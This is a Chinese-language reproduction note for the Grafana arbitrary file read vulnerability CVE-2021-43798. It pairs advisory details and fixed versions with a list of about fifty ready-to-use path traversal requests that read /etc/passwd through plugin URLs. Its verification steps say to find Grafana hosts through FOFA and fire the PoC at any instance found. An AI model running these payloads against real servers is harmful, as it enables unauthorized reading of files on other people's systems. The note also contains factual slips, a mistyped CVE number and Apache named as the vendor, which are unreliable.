漏洞信息:
Grafana任意文件读取漏洞利用,攻击者可以通过将包含特殊目录遍历字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件。
经验证,Grafana 版本8.3.0 仍受该漏洞影响,建议受影响用户通过禁用相关的漏洞利用路径请求进行临时防御,并禁用Grafana的公网访问。
基础信息
CVE:CVE-2021-43798
漏洞等级:高危 CVSS 分数 7.5 高
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
披露时间:2021-12-07 14:53:25
更新:2021年12月8日,Grafana发布安全通告,其中包含了影响8.0.0 - 8.3.0版本的路径遍历,CVE编号为CVE-2021-4379,目前Apache已经提供8.3.1, 8.2.7, 8.1.8, 8.0.7的安全版本,建议受影响用户尽快升级到安全版本进行漏洞修复。
漏洞危害
该漏洞源于Grafana 在获取公共插件资产的相关函数中对于路径参数的字符清理不当,导致攻击者可以通过将包含特殊目录遍历字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件。
影响范围
Grafana 8.x
修复方案
Grafana官方已经发布了解决上述漏洞的安全更新,建议受影响用户尽快升级到安全版本:
安全版本:
Grafana 8.3.1
Grafana 8.2.7
Grafana 8.1.8
Grafana 8.0.7
参考资料
https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
漏洞原理
易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。
每个 Grafana 实例都预装了 Prometheus 插件或 MySQL 插件等插件,因此每个实例的以下 URL 都容易受到攻击:
<grafana_host_url>/public/plugins/alertlist/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
<grafana_host_url>/public/plugins/gauge/
<grafana_host_url>/public/plugins/geomap/
<grafana_host_url>/public/plugins/gettingstarted/
<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
<grafana_host_url>/public/plugins/graph/
<grafana_host_url>/public/plugins/heatmap/
<grafana_host_url>/public/plugins/histogram/
<grafana_host_url>/public/plugins/influxdb/
<grafana_host_url>/public/plugins/jaeger/
<grafana_host_url>/public/plugins/logs/
<grafana_host_url>/public/plugins/loki/
<grafana_host_url>/public/plugins/mssql/
<grafana_host_url>/public/plugins/mysql/
<grafana_host_url>/public/plugins/news/
<grafana_host_url>/public/plugins/nodeGraph/
<grafana_host_url>/public/plugins/opentsdb
<grafana_host_url>/public/plugins/piechart/
<grafana_host_url>/public/plugins/pluginlist/
<grafana_host_url>/public/plugins/postgres/
<grafana_host_url>/public/plugins/prometheus/
<grafana_host_url>/public/plugins/stackdriver/
<grafana_host_url>/public/plugins/stat/
<grafana_host_url>/public/plugins/state-timeline/
<grafana_host_url>/public/plugins/status-history/
<grafana_host_url>/public/plugins/table/
<grafana_host_url>/public/plugins/table-old/
<grafana_host_url>/public/plugins/tempo/
<grafana_host_url>/public/plugins/testdata/
<grafana_host_url>/public/plugins/text/
<grafana_host_url>/public/plugins/timeseries/
<grafana_host_url>/public/plugins/welcome/
<grafana_host_url>/public/plugins/zipkin/
验证步骤
1、使用FOFA搜索 "Grafana"
2、任意抓一个符合要求:Grafana本版本号 >8.x 的进行请求
3、附带Poc
- "{{BaseURL}}/public/plugins/alertGroups/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/icon/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/alertmanager/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/annolist/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/barchart/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/bargauge/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/canvas/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/cloudwatch/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/dashboard/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/dashlist/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/debug/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/elasticsearch/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/gauge/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/geomap/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/gettingstarted/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/grafana/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/graph/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/graphite/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/heatmap/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/histogram/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/influxdb/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/jaeger/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/live/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/logs/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/loki/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/mixed/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/mssql/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/mysql/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/news/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/nodeGraph/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/opentsdb/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/piechart/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/pluginlist/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/postgres/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/prometheus/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/stat/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/state-timeline/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/status-history/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/table-old/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/table/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/tempo/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/testdata/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/text/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/timeseries/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/welcome/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/xychart/../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../etc/passwd"
END。。简单复现。记录笔记。。内网的一定要排查,切记切记!!!
